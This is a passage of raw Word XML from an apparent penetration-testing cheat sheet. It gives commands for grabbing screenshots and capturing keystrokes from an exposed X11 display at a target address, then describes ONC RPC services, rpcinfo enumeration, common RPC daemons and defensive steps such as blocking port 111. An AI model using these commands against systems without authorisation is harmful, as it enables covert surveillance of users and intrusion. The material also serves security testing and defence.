    <w:p w:rsidR="005E208E" w:rsidRDefault="005E208E" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E208E" w:rsidRPr="0003487C" w:rsidRDefault="005E208E" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Take a screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRPr="0003487C" w:rsidRDefault="0003487C"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w:t>
      </w:r>
      <w:r w:rsidR="005E208E" w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005E208E" w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –root –display &lt;ip&gt;:0 | xwud</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E208E" w:rsidRDefault="005E208E" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E208E" w:rsidRPr="0003487C" w:rsidRDefault="0003487C" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Capture keystrokes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003487C" w:rsidRPr="0003487C" w:rsidRDefault="0003487C"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xspy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –display &lt;ip&gt;:0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>F8 - RPC services</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="007721F5" w:rsidP="007721F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ONC RPC, short for Open Network Computing Remote Procedure Call, is a widely deployed remote procedure call system. ONC was originally developed by Sun Microsystems as part of their Network File System project, and is sometimes referred to as Sun ONC or Sun RPC. </w:t>
      </w:r>
      <w:r w:rsidR="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF23FF" w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RPC, is an interface that allows programmers to easily execute code on remote systems, usually Unix-based.</w:t>
      </w:r>
      <w:r w:rsidR="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Access to RPC services on a </w:t>
      </w:r>
      <w:r w:rsidR="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>machine are provided via a port</w:t>
      </w:r>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mapper that listens for queries on a well-known port (number 111) over UDP and TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Often rpc services run with root privileges. Most attacks work due to poor error checking or input validation tests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Best way to protect is to remove the unwanted/unused rpc services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Install all the latest vendor patches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Block at the perimeter the RPC portmapper tcp/udp 111 and other ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="007721F5" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Block the RPC loopback ports 32770-32789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F8a - RPC service enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007721F5" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00AF23FF" w:rsidRDefault="007721F5" w:rsidP="00AF23FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rpcinfo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF23FF" w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00AF23FF" w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F8b - Common RPC services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>portmapper gives the port of other rpc services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Provides notification of system reboots to the nfs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nsm_addrand</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Solaris's statd Network Status Monitor (NSM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sadmind</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>distributed system administration daemon of Sun Solstice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rquotad</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">needed if export or import file systems have quotas </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rusersd</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>service for letting remote systems know which users are logged on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sprayd</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Solstice administrator support program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>walld</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>A utility for letting people send messages to every user of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rstatd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>A utility for letting remote systems know your load average.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ttdbserverd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>This is used for some graphical operations like drag and drop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kcms_server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Kodak Color Management System (KCMS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cachefsd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Cache file system daemon used to speed up nfs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmsd</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>This is the CDE Calendar Manager service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vtsk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>SunVTS software diagnostic package that tests and validates hardware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nlockmgr</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS file locking service performs lock recovery when a system crashes or is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rebooted</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF23FF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gets notified by status rpc service.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00AF23FF" w:rsidRPr="00AF23FF" w:rsidRDefault="00AF23FF" w:rsidP="00AF23FF">
